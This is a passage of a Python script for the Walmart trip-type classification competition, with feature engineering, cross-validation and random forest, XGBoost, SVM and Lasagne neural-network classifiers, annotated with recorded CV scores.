PCA\nimport re\nimport random\nimport warnings\nfrom math import sqrt, exp, log\nfrom csv import DictReader\nfrom sklearn.preprocessing import Imputer\nfrom sklearn.metrics import log_loss\nfrom sklearn.grid_search import GridSearchCV , RandomizedSearchCV, ParameterSampler\nfrom sklearn.ensemble import RandomForestRegressor\nfrom scipy.stats import randint as sp_randint\nfrom sklearn import decomposition, pipeline, metrics\nfrom sklearn.preprocessing import StandardScaler, PolynomialFeatures\nfrom sklearn import preprocessing\nfrom sklearn.utils import shuffle\nfrom sklearn.metrics import roc_auc_score,roc_curve,auc\nimport collections\nimport ast\nfrom sklearn.neighbors import 
KNeighborsRegressor,RadiusNeighborsRegressor\nfrom sklearn.linear_model import LinearRegression, Ridge, Lasso, ElasticNet, SGDRegressor, LogisticRegression, \\\n Perceptron,RidgeCV, TheilSenRegressor\nfrom datetime import date,timedelta as td,datetime as dt\nimport datetime\nfrom sklearn.feature_selection import SelectKBest,SelectPercentile, f_classif, GenericUnivariateSelect\nfrom sklearn.calibration import CalibratedClassifierCV\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import LinearSVC, SVC\nfrom sklearn.decomposition import PCA, TruncatedSVD\nfrom sklearn.lda import LDA\nfrom sklearn.cluster import AgglomerativeClustering, FeatureAgglomeration\nfrom collections import defaultdict\nfrom sklearn.preprocessing import OneHotEncoder\nsys.path.append('C:\\\\Python34\\\\Lib\\\\site-packages\\\\xgboost')\nimport xgboost as xgb\n# from lasagne.layers import InputLayer, DropoutLayer, DenseLayer, ReshapeLayer,LSTMLayer,RecurrentLayer\n# from lasagne.updates import nesterov_momentum,adagrad\n# from lasagne.objectives import binary_crossentropy, categorical_crossentropy\n# from nolearn.lasagne import NeuralNet\n# import theano\n# from theano import tensor as T\n# from theano.tensor.nnet import sigmoid\n# from lasagne import layers\n# from lasagne.nonlinearities import softmax, rectify\n# from lasagne.updates import nesterov_momentum,sgd,adagrad,adadelta,rmsprop\n# from lasagne import nonlinearities as nl\n# from nolearn.lasagne import BatchIterator\n# from lasagne.regularization import *\n########################################################################################################################\n#Walmart Recruiting: Trip Type Classification\n########################################################################################################################\n#--------------------------------------------Algorithm : Random Forest :------------------------------------------------\n#Random Forest :\n#--------------------------------------------Algorithm : XGB------------------------------------------------------------\n#XGB :\n\n#--------------------------------------------Suggestions, Ideas---------------------------------------------------------\n#Suggestions, Ideas\n#--------------------------------------------with only 7K records-------------------------------------------------------\n# RF : 0.7410 - 7414 (with 7k)\n\n########################################################################################################################\n#Class AdjustVariable for NN\n########################################################################################################################\nclass AdjustVariable(object):\n def __init__(self, name, start=0.03, stop=0.001):\n self.name = name\n self.start, self.stop = start, stop\n self.ls = None\n\n def __call__(self, nn, train_history):\n if self.ls is None:\n self.ls = np.linspace(self.start, self.stop, nn.max_epochs)\n\n epoch = train_history[-1]['epoch']\n new_value = float32(self.ls[epoch - 1])\n getattr(nn, self.name).set_value(new_value)\n\n########################################################################################################################\n#Class EarlyStopping for NN\n########################################################################################################################\nclass EarlyStopping(object):\n def __init__(self, patience=100):\n self.patience = patience\n self.best_valid = np.inf\n self.best_valid_epoch = 0\n self.best_weights = None\n\n def __call__(self, 
nn, train_history):\n current_valid = train_history[-1]['valid_loss']\n current_epoch = train_history[-1]['epoch']\n if current_valid < self.best_valid:\n self.best_valid = current_valid\n self.best_valid_epoch = current_epoch\n self.best_weights = nn.get_all_params_values()\n elif self.best_valid_epoch + self.patience < current_epoch:\n print(\"Early stopping.\")\n print(\"Best valid loss was {:.6f} at epoch {}.\".format(\n self.best_valid, self.best_valid_epoch))\n nn.load_params_from(self.best_weights)\n raise StopIteration()\n\n#########################################################################################################################\ndef float32(k):\n return np.cast['float32'](k)\n#########################################################################################################################\n#Build Basic Neural Network Model\n########################################################################################################################\ndef build_mlp(input_num_inputs, output_num_units):\n\n print(\"***************Starting NN1 Classifier***************\")\n #Define Model parms - 2 hidden layers\n clf = NeuralNet(\n \tlayers=[\n ('input', InputLayer),\n ('dropout0', DropoutLayer),\n ('hidden1', DenseLayer),\n ('dropout1', DropoutLayer),\n ('hidden2', DenseLayer),\n ('dropout2', DropoutLayer),\n ('hidden3', DenseLayer),\n ('dropout3', DropoutLayer),\n ('output', DenseLayer)\n \t\t ],\n\n ##-------------------------------------------------------------------------------------------------------------##\n #Input (Input Layer) , Hidden and Output (Dense Layers) parameters\n\n # Layers:- http://lasagne.readthedocs.org/en/latest/modules/layers.html\n ##### Network input #####\n # Input Layer - This layer holds a symbolic variable that represents a network input.\n\n ##### Dense Layer #####\n # DenseLayer - A fully connected layer.\n # NINLayer - Network-in-network layer.\n\n ##### Noise layer #####\n # DropoutLayer - Dropout layer.\n # dropout - alias of DropoutLayer\n # GaussianNoiseLayer - Gaussian noise layer.\n ##-------------------------------------------------------------------------------------------------------------##\n # nonlinearity - Non-linear activation functions for artificial neurons.\n # http://lasagne.readthedocs.org/en/latest/modules/nonlinearities.html\n # sigmoid(x) - Sigmoid activation function (for binary classification)\n # softmax(x) - Softmax activation function (for multi class classification)\n # tanh(x) - Tanh activation function\n # ScaledTanH - Scaled Tanh activation function\n # rectify(x) - Rectify activation function max(0,z) -- (ReLU - ln(1 + e exp(x) )\n # LeakyRectify([leakiness] - Leaky rectifier\n # leaky_rectify(x) - Instance of LeakyRectify with leakines\n # very_leaky_rectify(x) - Instance of LeakyRectify with leakiness\n # elu(x) - Exponential Linear Unit ( e exp(x) - 1)\n # softplus(x) - Softplus activation function log(1 + e exp(x)\n # linear(x) - Linear activation function f(x)=x\n # identity(x) - Linear activation function f(x)=x\n # x = The activation (the summed, weighted input of a neuron)\n # Default non-linearity is \"linear\"\n ##-------------------------------------------------------------------------------------------------------------##\n input_shape=(None, input_num_inputs),\n dropout0_p=0.15,\n\n hidden1_num_units=500,\n hidden1_nonlinearity=nl.sigmoid,\n dropout1_p=0.20,\n\n hidden2_num_units=500,\n hidden2_nonlinearity=nl.sigmoid,\n dropout2_p=0.20,\n\n hidden3_num_units=500,\n 
hidden3_nonlinearity=nl.sigmoid,\n dropout3_p=0.20,\n\n output_nonlinearity=softmax,\n output_num_units=output_num_units,\n\n # optimization method:\n ##-------------------------------------------------------------------------------------------------------------##\n #Create update expressions for training, i.e., how to modify the parameters at each training step\n # http://lasagne.readthedocs.org/en/latest/modules/updates.html\n # sgd - Stochastic Gradient Descent (SGD) updates\n # momentum - Stochastic Gradient Descent (SGD) updates with momentum\n # nesterov_momentum - Stochastic Gradient Descent (SGD) updates with Nesterov momentum\n # adagrad\t - Adagrad updates\n # rmsprop\t - RMSProp updates\n # adadelta - Adadelta updates\n # adam - Adam updates\n ##-------------------------------------------------------------------------------------------------------------##\n update=adagrad,\n #update=nesterov_momentum,\n update_learning_rate=theano.shared(float32(0.01)),\n #update_momentum=theano.shared(float32(0.9)),\n\n ##-------------------------------------------------------------------------------------------------------------##\n # Used for building loss expressions for training or validating a neural network.\n # http://lasagne.readthedocs.org/en/latest/modules/objectives.html\n # binary_crossentropy - Computes log loss for binary classification\n # categorical_crossentropy - Computes the log loss for multi-class classification probs and softmax output units\n # squared_error - Computes the element-wise squared difference between two tensors (regression)\n # binary_hinge_loss - Computes the binary hinge loss between predictions and targets.\n # multiclass_hinge_loss - Computes the multi-class hinge loss between predictions and targets.\n # Deaflt - squared_error if regression else categorical_crossentropy\n ##-------------------------------------------------------------------------------------------------------------##\n objective_loss_function = categorical_crossentropy,\n\n ##-------------------------------------------------------------------------------------------------------------##\n max_epochs=500,\n eval_size=0.2,\n #train_split=TrainSplit(eval_size=0.2),\n regression=False,\n verbose=1,\n\n ##-------------------------------------------------------------------------------------------------------------##\n ## If label encoding is needed while clf.fit() ...label is already encoded in our case\n use_label_encoder=False,\n\n ## batch_iterator_train default is 128\n batch_iterator_train=BatchIterator(batch_size=128),\n batch_iterator_test=BatchIterator(batch_size=128),\n\n on_epoch_finished=[\n AdjustVariable('update_learning_rate', start=0.01, stop=0.0001),\n #AdjustVariable('update_momentum', start=0.9, stop=0.999),\n EarlyStopping(patience=25)\n ]\n ##-------------------------------------------------------------------------------------------------------------##\n )\n\n return clf\n\n#########################################################################################################################\n#Build Basic Neural Network Model\n########################################################################################################################\ndef build_rnn(input_num_inputs, output_num_units):\n\n print(\"***************Starting NN1 Classifier***************\")\n #Define Model parms - 2 hidden layers\n clf = NeuralNet(\n \tlayers=[\n ('input', InputLayer),\n ('lstm1', LSTMLayer),\n ('rshp1', ReshapeLayer),\n ('hidden1', DenseLayer),\n ('output', DenseLayer)\n \t\t 
],\n\n ##-------------------------------------------------------------------------------------------------------------##\n #Input (Input Layer) , Hidden and Output (Dense Layers) parameters\n\n # Layers:- http://lasagne.readthedocs.org/en/latest/modules/layers.html\n ##### Network input #####\n # Input Layer - This layer holds a symbolic variable that represents a network input.\n\n ##### Dense Layer #####\n # DenseLayer - A fully connected layer.\n # NINLayer - Network-in-network layer.\n\n ##### Noise layer #####\n # DropoutLayer - Dropout layer.\n # dropout - alias of DropoutLayer\n # GaussianNoiseLayer - Gaussian noise layer.\n ##-------------------------------------------------------------------------------------------------------------##\n # nonlinearity - Non-linear activation functions for artificial neurons.\n # http://lasagne.readthedocs.org/en/latest/modules/nonlinearities.html\n # sigmoid(x) - Sigmoid activation function (for binary classification)\n # softmax(x) - Softmax activation function (for multi class classification)\n # tanh(x) - Tanh activation function\n # ScaledTanH - Scaled Tanh activation function\n # rectify(x) - Rectify activation function max(0,z) -- (ReLU - ln(1 + e exp(x) )\n # LeakyRectify([leakiness] - Leaky rectifier\n # leaky_rectify(x) - Instance of LeakyRectify with leakines\n # very_leaky_rectify(x) - Instance of LeakyRectify with leakiness\n # elu(x) - Exponential Linear Unit ( e exp(x) - 1)\n # softplus(x) - Softplus activation function log(1 + e exp(x)\n # linear(x) - Linear activation function f(x)=x\n # identity(x) - Linear activation function f(x)=x\n # x = The activation (the summed, weighted input of a neuron)\n # Default non-linearity is \"linear\"\n ##-------------------------------------------------------------------------------------------------------------##\n #Shape input shape(343) * 512 * 37 * 37\n\n input_shape=(None, input_num_inputs),\n\n #batchsize, seqlen, _ = input_input_var.shape,\n lstm1_num_units = 512,\n lstm1_nonlinearity=nl.sigmoid,\n\n rshp1_shape = (-1, 512),\n\n hidden1_num_units=output_num_units,\n hidden1_nonlinearity=nl.sigmoid,\n\n output_nonlinearity=softmax,\n output_num_units=output_num_units,\n\n # optimization method:\n ##-------------------------------------------------------------------------------------------------------------##\n #Create update expressions for training, i.e., how to modify the parameters at each training step\n # http://lasagne.readthedocs.org/en/latest/modules/updates.html\n # sgd - Stochastic Gradient Descent (SGD) updates\n # momentum - Stochastic Gradient Descent (SGD) updates with momentum\n # nesterov_momentum - Stochastic Gradient Descent (SGD) updates with Nesterov momentum\n # adagrad\t - Adagrad updates\n # rmsprop\t - RMSProp updates\n # adadelta - Adadelta updates\n # adam - Adam updates\n ##-------------------------------------------------------------------------------------------------------------##\n update=adagrad,\n #update=sgd,\n update_learning_rate=0.01,\n #update_momentum=0.9,\n\n ##-------------------------------------------------------------------------------------------------------------##\n # Used for building loss expressions for training or validating a neural network.\n # http://lasagne.readthedocs.org/en/latest/modules/objectives.html\n # binary_crossentropy - Computes log loss for binary classification\n # categorical_crossentropy - Computes the log loss for multi-class classification probs and softmax output units\n # squared_error - Computes the element-wise 
squared difference between two tensors (regression)\n # binary_hinge_loss - Computes the binary hinge loss between predictions and targets.\n # multiclass_hinge_loss - Computes the multi-class hinge loss between predictions and targets.\n # Deaflt - squared_error if regression else categorical_crossentropy\n ##-------------------------------------------------------------------------------------------------------------##\n objective_loss_function = categorical_crossentropy,\n\n ##-------------------------------------------------------------------------------------------------------------##\n max_epochs=50,\n eval_size=0.2,\n #train_split=TrainSplit(eval_size=0.2),\n regression=False,\n verbose=1,\n\n ##-------------------------------------------------------------------------------------------------------------##\n ## If label encoding is needed while clf.fit() ...label is already encoded in our case\n use_label_encoder=False,\n\n ## batch_iterator_train default is 128\n batch_iterator_train=BatchIterator(batch_size=128),\n batch_iterator_test=BatchIterator(batch_size=128),\n\n # on_epoch_finished=[\n # AdjustVariable('update_learning_rate', start=0.01, stop=0.0001),\n # AdjustVariable('update_momentum', start=0.9, stop=0.999),\n # EarlyStopping(patience=10)\n # ]\n ##-------------------------------------------------------------------------------------------------------------##\n )\n\n return clf\n\n########################################################################################################################\n#Utility function to report best scores\n########################################################################################################################\ndef report(grid_scores, n_top):\n\n cols_key = []\n top_scores = sorted(grid_scores, key=itemgetter(1), reverse=True)[:n_top]\n\n for i, score in enumerate(top_scores):\n if( i < 5):\n print(\"Model with rank: {0}\".format(i + 1))\n print(\"Mean validation score: {0:.3f} (std: {1:.3f})\".format(\n score.mean_validation_score,\n np.std(score.cv_validation_scores)))\n print(\"Parameters: {0}\".format(score.parameters))\n print(\"\")\n\n dict1 = collections.OrderedDict(sorted(score.parameters.items()))\n\n if i==0:\n for key in dict1.keys():\n cols_key.append(key)\n\n cols_key.append('CV')\n Parms_DF = pd.DataFrame(columns=cols_key)\n\n cols_val = []\n for key in dict1.keys():\n cols_val.append(dict1[key])\n\n cols_val.append(score.mean_validation_score)\n\n Parms_DF.loc[i] = cols_val\n\n return Parms_DF\n\n########################################################################################################################\n#multiclass_log_loss\n########################################################################################################################\n\ndef multiclass_log_loss(y_true, y_pred):\n return log_loss(y_true,y_pred, eps=1e-15, normalize=True )\n\n########################################################################################################################\n#Cross Validation and model fitting\n########################################################################################################################\ndef Nfold_Cross_Valid(X, y, clf):\n\n print(\"***************Starting Kfold Cross validation***************\")\n\n X =np.array(X)\n scores=[]\n\n # lbl = preprocessing.LabelEncoder()\n # lbl.fit(list(y))\n # y = lbl.transform(y)\n\n ss = StratifiedShuffleSplit(y, n_iter=5,test_size=0.2)\n #ss = KFold(len(y), n_folds=5,shuffle=False,indices=None)\n\n i = 1\n\n for trainCV, 
testCV in ss:\n X_train, X_test= X[trainCV], X[testCV]\n y_train, y_test= y[trainCV], y[testCV]\n\n #clf.fit(X_train, y_train, early_stopping_rounds=25, eval_metric=\"mlogloss\",eval_set=[(X_test, y_test)])\n clf.fit(X_train, y_train)\n\n y_pred=clf.predict_proba(X_test)\n scores.append(log_loss(y_test,y_pred, eps=1e-15, normalize=True ))\n print(\" %d-iteration... %s \" % (i,scores))\n\n i = i + 1\n\n #Average ROC from cross validation\n scores=np.array(scores)\n print (\"Normal CV Score:\",np.mean(scores))\n\n print(\"***************Ending Kfold Cross validation***************\")\n\n return scores\n\n########################################################################################################################\n#Data cleansing , feature scalinng , splitting\n########################################################################################################################\ndef Data_Munging(Train_DS,Actual_DS):\n\n print(\"***************Starting Data cleansing***************\")\n\n global Train_DS1\n\n y = Train_DS.TripType.values\n\n lbl = preprocessing.LabelEncoder()\n lbl.fit(list(y))\n y = lbl.transform(y)\n\n Train_DS = Train_DS.drop(['TripType'], axis = 1)\n ##----------------------------------------------------------------------------------------------------------------##\n\n Train_DS['Weektype'] = np.where(np.logical_or(Train_DS['Weekday']=='Saturday' ,Train_DS['Weekday']=='Sunday' ), 1,2)\n\n #Label Encode Weekday\n lbl = preprocessing.LabelEncoder()\n lbl.fit((list(Train_DS['Weekday'].astype(str)) + list(Actual_DS['Weekday'].astype(str))))\n Train_DS['Weekday'] = lbl.transform(Train_DS['Weekday'].astype(str))\n Actual_DS['Weekday'] = lbl.transform(Actual_DS['Weekday'].astype(str))\n\n #weekday one hot encoding\n print(\"weekday one hot encoding\")\n New_DS = pd.concat([Train_DS, Actual_DS])\n dummies = pd.get_dummies(New_DS['Weekday'])\n cols_new = [ 'Weekday'+\"_\"+str(s) for s in list(dummies.columns)]\n New_DS[cols_new] = dummies\n Train_DS = New_DS.head(len(Train_DS))\n Actual_DS = New_DS.tail(len(Actual_DS))\n ##----------------------------------------------------------------------------------------------------------------##\n #Merge HighLow contrib\n\n print(np.shape(Train_DS))\n print(np.shape(Actual_DS))\n\n Train_DS = Train_DS.merge(HLContrib_DS,on='VisitNumber',how='left')\n Actual_DS = Actual_DS.merge(HLContrib_DS,on='VisitNumber',how='left')\n\n # Train_DS = Train_DS.merge(Autoencoder_DS,on='VisitNumber',how='left')\n # Actual_DS = Actual_DS.merge(Autoencoder_DS,on='VisitNumber',how='left')\n\n # newcols = list(HLContrib_DS_2.ix[:,'DD_buy1_0':'DD_ret1_68'].columns)\n # newcols.extend(['VisitNumber'])\n # Train_DS = Train_DS.merge(HLContrib_DS_2[newcols],on='VisitNumber',how='left')\n # Actual_DS = Actual_DS.merge(HLContrib_DS_2[newcols],on='VisitNumber',how='left')\n\n ##----------------------------------------------------------------------------------------------------------------##\n #Deleting any features during testing\n #ifyou want to delete main Fn\n test = Train_DS.head()\n test = test.ix[:,'FN_0':'FN_9999'].columns\n Train_DS = Train_DS.drop(test, axis = 1)\n Actual_DS = Actual_DS.drop(test, axis = 1)\n\n #ifyou want to delete 1000 Fn\n test = Train_DS.head()\n test = test.ix[:,'FinelineNumber_1000_1.0':'FinelineNumber_1000_9998.0'].columns\n Train_DS = Train_DS.drop(test, axis = 1)\n Actual_DS = Actual_DS.drop(test, axis = 1)\n\n #ifyou want to delete 1000 Upc\n test = Train_DS.head()\n test = 
test.ix[:,'Upc_1000_3082.0':'Upc_1000_775014200016.0'].columns\n Train_DS = Train_DS.drop(test, axis = 1)\n Actual_DS = Actual_DS.drop(test, axis = 1)\n\n #Delete only if DD with similarity matrix included\n test = Train_DS.head()\n test = test.ix[:,'DD_buy_0':'DD_ret_WIRELESS'].columns\n Train_DS = Train_DS.drop(test, axis = 1)\n Actual_DS = Actual_DS.drop(test, axis = 1)\n\n print(np.shape(Train_DS))\n print(np.shape(Actual_DS))\n ##----------------------------------------------------------------------------------------------------------------##\n\n print(\"Any scaling , log transformations\")\n\n Actual_DS = Actual_DS.sort(columns='VisitNumber',ascending=True)\n Train_DS, y = shuffle(Train_DS, y)\n\n Train_DS = Train_DS.drop(['VisitNumber'], axis = 1)\n Actual_DS = Actual_DS.drop(['VisitNumber'], axis = 1)\n\n Train_DS = Train_DS.replace([np.inf, -np.inf], np.nan)\n Actual_DS = Actual_DS.replace([np.inf, -np.inf], np.nan)\n\n Train_DS = Train_DS.fillna(0)\n Actual_DS = Actual_DS.fillna(0)\n\n Train_DS = np.array(np.log(100+ Train_DS))\n Actual_DS = np.array(np.log(100+ Actual_DS))\n\n #Setting Standard scaler for data\n stdScaler = StandardScaler(with_mean=True, with_std=True)\n stdScaler.fit(Train_DS,y)\n Train_DS = stdScaler.transform(Train_DS)\n Actual_DS = stdScaler.transform(Actual_DS)\n\n # Train_DS = np.array(Train_DS)\n # Actual_DS = np.array(Actual_DS)\n\n #Use PCA for feature extraction\n # pca = PCA(n_components=500)\n # pca.fit(Train_DS,y )\n # Train_DS = pca.transform(Train_DS)\n # Actual_DS = pca.transform(Actual_DS)\n\n print(np.shape(Train_DS))\n print(np.shape(Actual_DS))\n\n # pd.DataFrame(Train_DS).to_csv(file_path+'Train_DS_50000.csv')\n # sys.exit(0)\n print(\"***************Ending Data cleansing***************\")\n\n return Train_DS, Actual_DS, y\n\n########################################################################################################################\n#Random Forest Classifier (around 80%)\n########################################################################################################################\ndef RFC_Classifier(Train_DS, y, Actual_DS, Sample_DS, Grid):\n print(\"***************Starting Random Forest Classifier***************\")\n t0 = time()\n\n if Grid:\n #used for checking the best performance for the model using hyper parameters\n print(\"Starting model fit with Grid Search\")\n\n # specify parameters and distributions to sample from\n param_dist = {\n \"criterion\":['gini', 'entropy'],\n \"max_depth\": [1, 2, 3, 4, 5,6,7,8,9,10,11,12,13,14,15, None],\n \"max_features\": [1, 2, 3, 4, 5,6,7,8,9,10,11,12,13,14,15, None,'auto','log2'],\n \"min_samples_split\": sp_randint(1, 50),\n \"min_samples_leaf\": sp_randint(1, 50),\n \"bootstrap\": [True],\n \"oob_score\": [True, False]\n }\n\n clf = RandomForestClassifier(n_estimators=100,n_jobs=-1)\n\n # run randomized search\n n_iter_search = 3000\n clf = RandomizedSearchCV(clf, param_distributions=param_dist,\n n_iter=n_iter_search, scoring = 'roc_auc',cv=5)\n\n start = time()\n clf.fit(Train_DS, y)\n\n print(\"RandomizedSearchCV took %.2f seconds for %d candidates\"\n \" parameter settings.\" % ((time() - start), n_iter_search))\n report(clf.grid_scores_)\n\n print(\"Best estimator found by grid search:\")\n print(clf.best_estimator_)\n else:\n\n #CV: 1.505327 , 20 K , n_estimators =100 , features = 343 (without FN and Upc and using eucledean for DD)\n clf = RandomForestClassifier(n_jobs=-1, n_estimators=100, min_samples_split=1,max_features='auto',bootstrap=True,\n max_depth = 8, 
min_samples_leaf = 4,oob_score=True,criterion='entropy')\n\n #CV: 1.995509 , 20 K , n_estimators =100 , features = 343 (without FN and Upc and using eucledean for DD)\n clf = RandomForestClassifier(n_jobs=-1, n_estimators=100)\n\n Nfold_score = Nfold_Cross_Valid(Train_DS, y, clf)\n\n sys.exit(0)\n #clf = RandomForestClassifier(n_jobs=-1, n_estimators=2000)\n #clf = CalibratedClassifierCV(base_estimator=clf, method='sigmoid')\n\n clf.fit(Train_DS, y)\n\n # #\n # feature = pd.DataFrame()\n # feature['imp'] = clf.feature_importances_\n # feature['col'] = Train_DS1.columns\n # feature = feature.sort(['imp'], ascending=False).reset_index(drop=True)\n # print(feature)\n # pd.DataFrame(feature).to_csv(file_path+'feature_imp.csv')\n\n #Predict actual model\n pred_Actual = clf.predict_proba(Actual_DS)\n print(\"Actual Model predicted\")\n\n #Get the predictions for actual data set\n preds = pd.DataFrame(pred_Actual, index=Sample_DS.VisitNumber.values, columns=Sample_DS.columns[1:])\n preds.to_csv(file_path+'output/Submission_Roshan_rfc_1.csv', index_label='VisitNumber')\n\n print(\"***************Ending Random Forest Classifier***************\")\n return pred_Actual\n\n########################################################################################################################\n#XGB_Classifier\n########################################################################################################################\ndef XGB_Classifier(Train_DS, y, Actual_DS, Sample_DS, Grid):\n\n print(\"***************Starting XGB Classifier***************\")\n t0 = time()\n\n if Grid:\n #used for checking the best performance for the model using hyper parameters\n print(\"Starting model fit with Grid Search\")\n\n param_grid = {'n_estimators': [25],\n 'max_depth': [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,17,19,20,40,80,100,200],\n 'min_child_weight': [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,20,40,80,100],\n 'subsample': [0.1,0.2,0.3,0.4,0.5,0.6, 0.7,0.8, 0.9,1],\n 'colsample_bytree': [0.1,0.2,0.3,0.4,0.5,0.6, 0.7,0.8, 0.9,1],\n 'silent':[True],\n 'gamma':[2,1,0.1,0.2,0.3,0.4,0.5,0.6, 0.7,0.8, 0.9]\n }\n\n #run randomized search\n n_iter_search = 800\n clf = xgb.XGBClassifier(nthread=8)\n clf = RandomizedSearchCV(clf, param_distributions=param_grid,\n n_iter=n_iter_search, scoring = 'log_loss',cv=3)\n start = time()\n clf.fit(np.array(Train_DS), np.array(y))\n\n print(\"GridSearchCV completed\")\n Parms_DS_Out = report(clf.grid_scores_,n_top=n_iter_search)\n Parms_DS_Out.to_csv(file_path+'Parms_DS_XGB_4.csv')\n\n print(\"Best estimator found by grid search:\")\n print(clf.best_estimator_)\n sys.exit(0)\n else:\n ##----------------------------------------------------------------------------------------------------------------##\n #best from grid Search, best n_est=175\n #CV:0.936880 , 20 K , n_estimators =100 , features = 343 (without FN and Upc and using eucledean for DD)*** current best\n clf = xgb.XGBClassifier(n_estimators=100,max_depth=100,learning_rate=0.1,nthread=8,min_child_weight=1,\n subsample=0.6,colsample_bytree=0.9,silent=True, gamma = 2 )\n\n ##----------------------------------------------------------------------------------------------------------------##\n #CV: 0.955185 , 20 K , n_estimators =100 , features = 343 (without FN and Upc)\n #CV: 0.935217 , 20 K , n_estimators =100 , features = 343 (without FN and Upc and using eucledean for DD)\n #CV: 0.927019 , 20 K , n_estimators =100 , features = 343 (without FN and Upc and using cos_sim for DD) *****not used ovefitting\n #CV: 0.922370 , 20 K , 
n_estimators =100 , features = 343 (without FN and Upc and using eucl + cos_sim for DD) *****not used ovefitting\n\n ##................................................................................................................##\n #CV: 0.942477 , 20 K , n_estimators =100 , features = 343 (without FN and Upc and using eucledean for DD)\n #clf = xgb.XGBClassifier(n_estimators=100,nthread=8)\n\n ##----------------------------------------------------------------------------------------------------------------##\n\n Nfold_score = Nfold_Cross_Valid(Train_DS, y, clf)\n\n sys.exit(0)\n\n X_train = np.array(Train_DS)\n Y_train = np.array(y)\n\n clf.fit(X_train, Y_train)\n\n X_Actual = np.array(Actual_DS)\n\n #Predict actual model\n pred_Actual = clf.predict_proba(X_Actual)\n print(\"Actual Model predicted\")\n\n #Get the predictions for actual data set\n preds = pd.DataFrame(pred_Actual, index=Sample_DS.VisitNumber.values, columns=Sample_DS.columns[1:])\n preds.to_csv(file_path+'output/Submission_Roshan_xgb_6_withFNnumber.csv', index_label='VisitNumber')\n\n print(\"***************Ending XGB Classifier***************\")\n return pred_Actual\n\n########################################################################################################################\n#XGB_Classifier\n########################################################################################################################\ndef XGB_Orig_binlog_Classifier(Train_DS, y, Actual_DS, Sample_DS, Grid):\n\n print(\"***************Starting XGB binlog Classifier***************\")\n t0 = time()\n\n if Grid:\n #used for checking the best performance for the model using hyper parameters\n print(\"Starting model fit with Grid Search\")\n else:\n\n #convert all data frames to numpy arrays for xgb use\n dtrain = xgb.DMatrix(Train_DS, label=y)\n dtest = xgb.DMatrix(Actual_DS)\n print(len(np.unique(y)))\n\n #only for cross validation\n # X_train, X_cv, Y_train, Y_cv = train_test_split(Train_DS, y, test_size=0.5, random_state=42)\n # dtrain = xgb.DMatrix(X_train, label=Y_train)\n # dtest = xgb.DMatrix(X_cv, label=Y_cv)\n\n # specify parameters\n # param = {'max_depth':14, 'eta':0.01, 'min_child_weight':8,'subsample': 0.9,'colsample_bytree':0.3,\n # 'silent':True, 'gamma': 0.9,'nthread': -1,'objective':'binary:logistic', 'eval_metric':'auc' }\n\n param = {'nthread': 8,'objective':'multi:softprob','num_class':len(np.unique(y)), 'eval_metric':'mlogloss','silent':True}\n\n plst = param.items()\n #best with 115 rounds 0.7522\n num_round = 115\n\n #print ('running cross validation')\n #xgb.cv(param, dtrain, num_round, nfold=2,metrics={'mlogloss'}, seed = 0, show_stdv = False)\n\n # specify validations set to watch performance\n watchlist = [(dtest,'eval'), (dtrain,'train')]\n\n print(\"Starting training\")\n\n #clf = xgb.train( plst, dtrain, num_round,watchlist,early_stopping_rounds=50)\n\n clf = xgb.train( plst, dtrain, num_round)\n print(\"training completed\")\n\n #print \"testing\"\n pred_Actual = clf.predict(dtest)\n\n print(\"Actual Model predicted\")\n\n #Get the predictions for actual data set\n preds = pd.DataFrame(pred_Actual, index=Sample_DS.VisitNumber.values, columns=Sample_DS.columns[1:])\n preds.to_csv(file_path+'output/Submission_Roshan_xgb_orig_6_withFNnumber.csv', index_label='VisitNumber')\n\n print(\"***************Ending XGB Classifier***************\")\n return pred_Actual\n########################################################################################################################\n#Misc 
Classifier\n########################################################################################################################\ndef Misc_Classifier(Train_DS, y, Actual_DS, Sample_DS, Grid):\n print(\"***************Starting Misc Classifier***************\")\n t0 = time()\n\n if Grid:\n #used for checking the best performance for the model using hyper parameters\n print(\"Starting model fit with Grid Search\")\n\n else:\n\n #CV - 0.666186155556\n #CV - 0.6670 - remove date MM/DD/YY and todays difff\n # clf = LogisticRegression()\n # Nfold_score = Nfold_Cross_Valid(Train_DS, y, clf)\n #sys.exit(0)\n\n #print(\"Adaboost\")\n #CV: 0.7099\n #clf = AdaBoostClassifier(n_estimators=100)\n\n # print(\"BaggingClassifier\")\n # #CV:\n # clf = BaggingClassifier(n_estimators=100)\n # Nfold_score = Nfold_Cross_Valid(Train_DS, y, clf)\n #\n # print(\"ExtraTreesClassifier\")\n # #CV:2.22\n # clf = ExtraTreesClassifier(n_estimators=100)\n # Nfold_score = Nfold_Cross_Valid(Train_DS, y, clf)\n\n # print(\"MultinomialNB\")\n # #CV:\n # clf = MultinomialNB()\n # Nfold_score = Nfold_Cross_Valid(Train_DS, y, clf)\n #\n # print(\"BernoulliNB\")\n # #CV:\n # clf = BernoulliNB()\n # Nfold_score = Nfold_Cross_Valid(Train_DS, y, clf)\n\n #clf = SVC(kernel='rbf', class_weight='auto',C=1e5, gamma= 0.001,probability=True)\n clf = SVC(probability=True)\n Nfold_score = Nfold_Cross_Valid(Train_DS, y, clf)\n sys.exit(0)\n\n clf.fit(Train_DS, y)\n\n # feature = pd.DataFrame()\n # feature['imp'] = clf.feature_importances_\n # feature['col'] = Train_DS1.columns\n # feature = feature.sort(['imp'], ascending=False).reset_index(drop=True)\n # print(feature)\n\n #Predict actual model\n pred_Actual = clf.predict(Actual_DS)[:,1]\n print(\"Actual Model predicted\")\n\n #Get the predictions for actual data set\n preds = pd.DataFrame(pred_Actual, index=Sample_DS.ID.values, columns=Sample_DS.columns[1:])\n preds.to_csv(file_path+'output/Submission_Roshan_Misc_filter_2.csv', index_label='ID')\n\n print(\"***************Ending Random Forest Classifier***************\")\n return pred_Actual\n\n#########################################################################################################################\n#Neural Network Classifier 1\n########################################################################################################################\ndef NN1_Classifier(Train_DS, y, Actual_DS, Sample_DS, Grid):\n\n print(\"***************Starting NN1 Classifier***************\")\n t0 = time()\n\n if Grid:\n #used for checking the best performance for the model using hyper parameters\n print(\"Starting model fit with Grid Search\")\n\n else:\n #y = y.reshape((-1, 1))\n\n learning_rate = theano.shared(np.float32(0.1))\n\n y = y.astype(np.int32)\n Train_DS = Train_DS.astype('float32')\n Actual_DS = Actual_DS.astype('float32')\n\n ##----------------------------------------------------------------------------------------------------------------##\n #Best CV's\n #CV:1.011700 ,sigmoid, max_epochs =15 , Dense = 700,700 (without FN and Upc and using eucledean for DD)\n #CV:1.010100 ,sigmoid, max_epochs =15 , Dense = 